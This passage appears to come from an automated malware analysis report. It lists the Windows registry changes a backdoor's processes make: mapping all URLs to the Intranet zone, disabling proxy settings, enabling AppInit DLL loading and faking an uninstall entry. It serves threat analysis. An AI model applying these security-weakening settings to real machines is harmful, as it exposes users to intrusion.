[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"SpUninstallCleanUp"
The process cltmng.exe:996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F0 AD EC 9C A6 77 BE 21 CC 85 3C DC 12 40 F2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process usetup.exe:3420 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 25 DA DC 41 BA AA D7 AC 4B 80 45 A4 DD 4F 07"
The process cltmngui.exe:1296 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 37 E4 E8 13 07 42 4F 4F 78 A3 10 64 4B E3 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots, which do not refer to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:3116 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 FA 11 E2 5E 53 E4 C1 73 DA B3 5D FE 3D 30 D1"
The process rundll32.exe:3052 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 3F CC 15 8A C9 CA 4E 0E B0 CA 44 2A A8 13 38"
The process %original file name%.exe:312 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"TSAware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ReceiveTimeout" = "600000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{735B0~1\Setup.exe /remove /q"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons]
"usetup.exe" = "usetup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"TizPath" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"Version" = "16777216"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB4.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tsu905D28F2.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{735B0~1\Setup.exe /remove /q0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"EstimatedSize" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"Language" = "1033"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 04 7A 4A 78 41 5C DF 3E 0F 79 36 78 73 78 0E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons]
"sp-downloader.exe" = "Search Protect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\571c756e-656d-49bc-97e6-a0b536b2c4a3]
"VersionMinor" = "0"
"VersionMajor" = "1"
The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process nsuB5.exe:516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqB9.tmp\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 32 54 8B C3 55 8B 70 52 06 34 A2 32 66 E1 2F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsuC3.exe:2608 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nskC5.tmp\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 FB 67 E2 0C 17 C8 6F ED 0A 12 1D 56 87 F2 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Backdoor modifies IE settings for security zones to map all local web nodes with no dots that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process UpdateSoftware.exe:3512 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0]
"iiid" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 89 44 CE BF E0 60 7D B3 BB 03 65 70 EE BC 05"
The process UpdateSoftware.exe:3456 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\UpdateSoftware\3956077583\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 jyYwQburpniZRRB5FiXXl0Nh4RV" = "NP6yu5 qaAnCQDWYSUGOC2EC0BO122uP"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"URLUpdateInfo" = ""
"URLInfoAbout" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"Publisher" = "PremiumSoft"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
